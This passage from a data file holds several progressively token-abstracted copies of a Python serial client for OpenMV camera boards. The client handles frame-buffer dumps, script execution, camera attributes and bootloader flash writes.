path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\ndef save_descriptor(x, y, w, h, path):\n buf = struct.pack('HHHH', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_DESCRIPTOR_SAVE, len(buf)))\n __serial.write(buf)\n\n\ndef set_attr(attr, value):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ATTR_WRITE, 8))\n __serial.write(struct.pack('<II', attr, value))\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\ndef reset():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SYS_RESET, 0))\n\n\ndef reset_to_bl():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SYS_RESET_TO_BL, 0))\n\n\ndef bootloader_start():\n __serial.write(struct.pack('<I', __BOOTLDR_START))\n return struct.unpack('I', __serial.read(4))[0] == __BOOTLDR_START\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\ndef flash_write(buf):\n __serial.write(struct.pack('<I', __BOOTLDR_WRITE) + buf)\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef tx_buf(bytes):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF, bytes))\n return __serial.read(bytes)\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\ndef enable_fb(enable):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FB_ENABLE, 4))\n __serial.write(struct.pack('<I', enable))\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 3:\n print('usage: pyopenmv.py <port> <script>')\n sys.exit(1)\n with open(sys.argv[2], 'r') as fin:\n buf = fin.read()\n disconnect()\n init(sys.argv[1])\n stop_script()\n exec_script(buf)\n tx_len = tx_buf_len()\n time.sleep(0.25)\n if tx_len:\n print(tx_buf(tx_len).decode())\n disconnect()\n",
"<import token>\n__serial = None\n__FB_HDR_SIZE = 12\n__USBDBG_CMD = 48\n__USBDBG_FW_VERSION = 128\n__USBDBG_FRAME_SIZE = 129\n__USBDBG_FRAME_DUMP = 130\n__USBDBG_ARCH_STR = 131\n__USBDBG_SCRIPT_EXEC = 5\n__USBDBG_SCRIPT_STOP = 6\n__USBDBG_SCRIPT_SAVE = 7\n__USBDBG_SCRIPT_RUNNING = 135\n__USBDBG_TEMPLATE_SAVE = 8\n__USBDBG_DESCRIPTOR_SAVE = 9\n__USBDBG_ATTR_READ = 138\n__USBDBG_ATTR_WRITE = 11\n__USBDBG_SYS_RESET = 12\n__USBDBG_SYS_RESET_TO_BL = 14\n__USBDBG_FB_ENABLE = 13\n__USBDBG_TX_BUF_LEN = 142\n__USBDBG_TX_BUF = 143\nATTR_CONTRAST = 0\nATTR_BRIGHTNESS = 1\nATTR_SATURATION = 2\nATTR_GAINCEILING = 3\n__BOOTLDR_START = 2882338817\n__BOOTLDR_RESET = 2882338818\n__BOOTLDR_ERASE = 2882338820\n__BOOTLDR_WRITE = 2882338824\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\ndef set_timeout(timeout):\n __serial.timeout = timeout\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\ndef fb_dump():\n size = fb_size()\n if not size[0]:\n return None\n if size[2] > 2:\n num_bytes = size[2]\n else:\n num_bytes = size[0] * size[1] * size[2]\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_DUMP,\n num_bytes))\n buff = __serial.read(num_bytes)\n if size[2] == 1:\n y = np.fromstring(buff, dtype=np.uint8)\n buff = np.column_stack((y, y, y))\n elif size[2] == 2:\n arr = np.fromstring(buff, dtype=np.uint16).newbyteorder('S')\n r = (((arr & 63488) >> 11) * 255.0 / 31.0).astype(np.uint8)\n g = (((arr & 2016) >> 5) * 255.0 / 63.0).astype(np.uint8)\n b = (((arr & 31) >> 0) * 255.0 / 31.0).astype(np.uint8)\n buff = np.column_stack((r, g, b))\n else:\n try:\n buff = np.asarray(Image.frombuffer('RGB', size[0:2], buff,\n 'jpeg', 'RGB', ''))\n except Exception as e:\n print('JPEG decode error (%s)' % e)\n return None\n if buff.size != size[0] * size[1] * 3:\n return None\n return size[0], size[1], buff.reshape((size[1], size[0], 3))\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\ndef save_descriptor(x, y, w, h, path):\n buf = struct.pack('HHHH', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_DESCRIPTOR_SAVE, len(buf)))\n __serial.write(buf)\n\n\ndef set_attr(attr, value):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ATTR_WRITE, 8))\n __serial.write(struct.pack('<II', attr, value))\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\ndef reset():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SYS_RESET, 0))\n\n\ndef reset_to_bl():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SYS_RESET_TO_BL, 0))\n\n\ndef bootloader_start():\n __serial.write(struct.pack('<I', __BOOTLDR_START))\n return struct.unpack('I', __serial.read(4))[0] == __BOOTLDR_START\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\ndef flash_write(buf):\n __serial.write(struct.pack('<I', __BOOTLDR_WRITE) + buf)\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef tx_buf(bytes):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF, bytes))\n return __serial.read(bytes)\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\ndef enable_fb(enable):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FB_ENABLE, 4))\n __serial.write(struct.pack('<I', enable))\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 3:\n print('usage: pyopenmv.py <port> <script>')\n sys.exit(1)\n with open(sys.argv[2], 'r') as fin:\n buf = fin.read()\n disconnect()\n init(sys.argv[1])\n stop_script()\n exec_script(buf)\n tx_len = tx_buf_len()\n time.sleep(0.25)\n if tx_len:\n print(tx_buf(tx_len).decode())\n disconnect()\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\ndef set_timeout(timeout):\n __serial.timeout = timeout\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\ndef fb_dump():\n size = fb_size()\n if not size[0]:\n return None\n if size[2] > 2:\n num_bytes = size[2]\n else:\n num_bytes = size[0] * size[1] * size[2]\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_DUMP,\n num_bytes))\n buff = __serial.read(num_bytes)\n if size[2] == 1:\n y = np.fromstring(buff, dtype=np.uint8)\n buff = np.column_stack((y, y, y))\n elif size[2] == 2:\n arr = np.fromstring(buff, dtype=np.uint16).newbyteorder('S')\n r = (((arr & 63488) >> 11) * 255.0 / 31.0).astype(np.uint8)\n g = (((arr & 2016) >> 5) * 255.0 / 63.0).astype(np.uint8)\n b = (((arr & 31) >> 0) * 255.0 / 31.0).astype(np.uint8)\n buff = np.column_stack((r, g, b))\n else:\n try:\n buff = np.asarray(Image.frombuffer('RGB', size[0:2], buff,\n 'jpeg', 'RGB', ''))\n except Exception as e:\n print('JPEG decode error (%s)' % e)\n return None\n if buff.size != size[0] * size[1] * 3:\n return None\n return size[0], size[1], buff.reshape((size[1], size[0], 3))\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\ndef save_descriptor(x, y, w, h, path):\n buf = struct.pack('HHHH', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_DESCRIPTOR_SAVE, len(buf)))\n __serial.write(buf)\n\n\ndef set_attr(attr, value):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ATTR_WRITE, 8))\n __serial.write(struct.pack('<II', attr, value))\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\ndef reset():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SYS_RESET, 0))\n\n\ndef reset_to_bl():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SYS_RESET_TO_BL, 0))\n\n\ndef bootloader_start():\n __serial.write(struct.pack('<I', __BOOTLDR_START))\n return struct.unpack('I', __serial.read(4))[0] == __BOOTLDR_START\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\ndef flash_write(buf):\n __serial.write(struct.pack('<I', __BOOTLDR_WRITE) + buf)\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef tx_buf(bytes):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF, bytes))\n return __serial.read(bytes)\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\ndef enable_fb(enable):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FB_ENABLE, 4))\n __serial.write(struct.pack('<I', enable))\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 3:\n print('usage: pyopenmv.py <port> <script>')\n sys.exit(1)\n with open(sys.argv[2], 'r') as fin:\n buf = fin.read()\n disconnect()\n init(sys.argv[1])\n stop_script()\n exec_script(buf)\n tx_len = tx_buf_len()\n time.sleep(0.25)\n if tx_len:\n print(tx_buf(tx_len).decode())\n disconnect()\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\ndef set_timeout(timeout):\n __serial.timeout = timeout\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\ndef fb_dump():\n size = fb_size()\n if not size[0]:\n return None\n if size[2] > 2:\n num_bytes = size[2]\n else:\n num_bytes = size[0] * size[1] * size[2]\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_DUMP,\n num_bytes))\n buff = __serial.read(num_bytes)\n if size[2] == 1:\n y = np.fromstring(buff, dtype=np.uint8)\n buff = np.column_stack((y, y, y))\n elif size[2] == 2:\n arr = np.fromstring(buff, dtype=np.uint16).newbyteorder('S')\n r = (((arr & 63488) >> 11) * 255.0 / 31.0).astype(np.uint8)\n g = (((arr & 2016) >> 5) * 255.0 / 63.0).astype(np.uint8)\n b = (((arr & 31) >> 0) * 255.0 / 31.0).astype(np.uint8)\n buff = np.column_stack((r, g, b))\n else:\n try:\n buff = np.asarray(Image.frombuffer('RGB', size[0:2], buff,\n 'jpeg', 'RGB', ''))\n except Exception as e:\n print('JPEG decode error (%s)' % e)\n return None\n if buff.size != size[0] * size[1] * 3:\n return None\n return size[0], size[1], buff.reshape((size[1], size[0], 3))\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\ndef save_descriptor(x, y, w, h, path):\n buf = struct.pack('HHHH', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_DESCRIPTOR_SAVE, len(buf)))\n __serial.write(buf)\n\n\ndef set_attr(attr, value):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ATTR_WRITE, 8))\n __serial.write(struct.pack('<II', attr, value))\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\ndef reset():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SYS_RESET, 0))\n\n\ndef reset_to_bl():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SYS_RESET_TO_BL, 0))\n\n\ndef bootloader_start():\n __serial.write(struct.pack('<I', __BOOTLDR_START))\n return struct.unpack('I', __serial.read(4))[0] == __BOOTLDR_START\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\ndef flash_write(buf):\n __serial.write(struct.pack('<I', __BOOTLDR_WRITE) + buf)\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef tx_buf(bytes):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF, bytes))\n return __serial.read(bytes)\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\ndef enable_fb(enable):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FB_ENABLE, 4))\n __serial.write(struct.pack('<I', enable))\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\ndef set_timeout(timeout):\n __serial.timeout = timeout\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\ndef fb_dump():\n size = fb_size()\n if not size[0]:\n return None\n if size[2] > 2:\n num_bytes = size[2]\n else:\n num_bytes = size[0] * size[1] * size[2]\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_DUMP,\n num_bytes))\n buff = __serial.read(num_bytes)\n if size[2] == 1:\n y = np.fromstring(buff, dtype=np.uint8)\n buff = np.column_stack((y, y, y))\n elif size[2] == 2:\n arr = np.fromstring(buff, dtype=np.uint16).newbyteorder('S')\n r = (((arr & 63488) >> 11) * 255.0 / 31.0).astype(np.uint8)\n g = (((arr & 2016) >> 5) * 255.0 / 63.0).astype(np.uint8)\n b = (((arr & 31) >> 0) * 255.0 / 31.0).astype(np.uint8)\n buff = np.column_stack((r, g, b))\n else:\n try:\n buff = np.asarray(Image.frombuffer('RGB', size[0:2], buff,\n 'jpeg', 'RGB', ''))\n except Exception as e:\n print('JPEG decode error (%s)' % e)\n return None\n if buff.size != size[0] * size[1] * 3:\n return None\n return size[0], size[1], buff.reshape((size[1], size[0], 3))\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\ndef save_descriptor(x, y, w, h, path):\n buf = struct.pack('HHHH', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_DESCRIPTOR_SAVE, len(buf)))\n __serial.write(buf)\n\n\ndef set_attr(attr, value):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ATTR_WRITE, 8))\n __serial.write(struct.pack('<II', attr, value))\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\ndef reset():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SYS_RESET, 0))\n\n\ndef reset_to_bl():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SYS_RESET_TO_BL, 0))\n\n\ndef bootloader_start():\n __serial.write(struct.pack('<I', __BOOTLDR_START))\n return struct.unpack('I', __serial.read(4))[0] == __BOOTLDR_START\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef tx_buf(bytes):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF, bytes))\n return __serial.read(bytes)\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\ndef enable_fb(enable):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FB_ENABLE, 4))\n __serial.write(struct.pack('<I', enable))\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\ndef set_timeout(timeout):\n __serial.timeout = timeout\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\ndef fb_dump():\n size = fb_size()\n if not size[0]:\n return None\n if size[2] > 2:\n num_bytes = size[2]\n else:\n num_bytes = size[0] * size[1] * size[2]\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_DUMP,\n num_bytes))\n buff = __serial.read(num_bytes)\n if size[2] == 1:\n y = np.fromstring(buff, dtype=np.uint8)\n buff = np.column_stack((y, y, y))\n elif size[2] == 2:\n arr = np.fromstring(buff, dtype=np.uint16).newbyteorder('S')\n r = (((arr & 63488) >> 11) * 255.0 / 31.0).astype(np.uint8)\n g = (((arr & 2016) >> 5) * 255.0 / 63.0).astype(np.uint8)\n b = (((arr & 31) >> 0) * 255.0 / 31.0).astype(np.uint8)\n buff = np.column_stack((r, g, b))\n else:\n try:\n buff = np.asarray(Image.frombuffer('RGB', size[0:2], buff,\n 'jpeg', 'RGB', ''))\n except Exception as e:\n print('JPEG decode error (%s)' % e)\n return None\n if buff.size != size[0] * size[1] * 3:\n return None\n return size[0], size[1], buff.reshape((size[1], size[0], 3))\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\ndef save_descriptor(x, y, w, h, path):\n buf = struct.pack('HHHH', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_DESCRIPTOR_SAVE, len(buf)))\n __serial.write(buf)\n\n\n<function token>\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\ndef reset():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SYS_RESET, 0))\n\n\ndef reset_to_bl():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SYS_RESET_TO_BL, 0))\n\n\ndef bootloader_start():\n __serial.write(struct.pack('<I', __BOOTLDR_START))\n return struct.unpack('I', __serial.read(4))[0] == __BOOTLDR_START\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef tx_buf(bytes):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF, bytes))\n return __serial.read(bytes)\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\ndef enable_fb(enable):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FB_ENABLE, 4))\n __serial.write(struct.pack('<I', enable))\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\ndef set_timeout(timeout):\n __serial.timeout = timeout\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\ndef fb_dump():\n size = fb_size()\n if not size[0]:\n return None\n if size[2] > 2:\n num_bytes = size[2]\n else:\n num_bytes = size[0] * size[1] * size[2]\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_DUMP,\n num_bytes))\n buff = __serial.read(num_bytes)\n if size[2] == 1:\n y = np.fromstring(buff, dtype=np.uint8)\n buff = np.column_stack((y, y, y))\n elif size[2] == 2:\n arr = np.fromstring(buff, dtype=np.uint16).newbyteorder('S')\n r = (((arr & 63488) >> 11) * 255.0 / 31.0).astype(np.uint8)\n g = (((arr & 2016) >> 5) * 255.0 / 63.0).astype(np.uint8)\n b = (((arr & 31) >> 0) * 255.0 / 31.0).astype(np.uint8)\n buff = np.column_stack((r, g, b))\n else:\n try:\n buff = np.asarray(Image.frombuffer('RGB', size[0:2], buff,\n 'jpeg', 'RGB', ''))\n except Exception as e:\n print('JPEG decode error (%s)' % e)\n return None\n if buff.size != size[0] * size[1] * 3:\n return None\n return size[0], size[1], buff.reshape((size[1], size[0], 3))\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\n<function token>\n<function token>\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\ndef reset():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SYS_RESET, 0))\n\n\ndef reset_to_bl():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SYS_RESET_TO_BL, 0))\n\n\ndef bootloader_start():\n __serial.write(struct.pack('<I', __BOOTLDR_START))\n return struct.unpack('I', __serial.read(4))[0] == __BOOTLDR_START\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef tx_buf(bytes):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF, bytes))\n return __serial.read(bytes)\n\n\ndef fw_version():\n 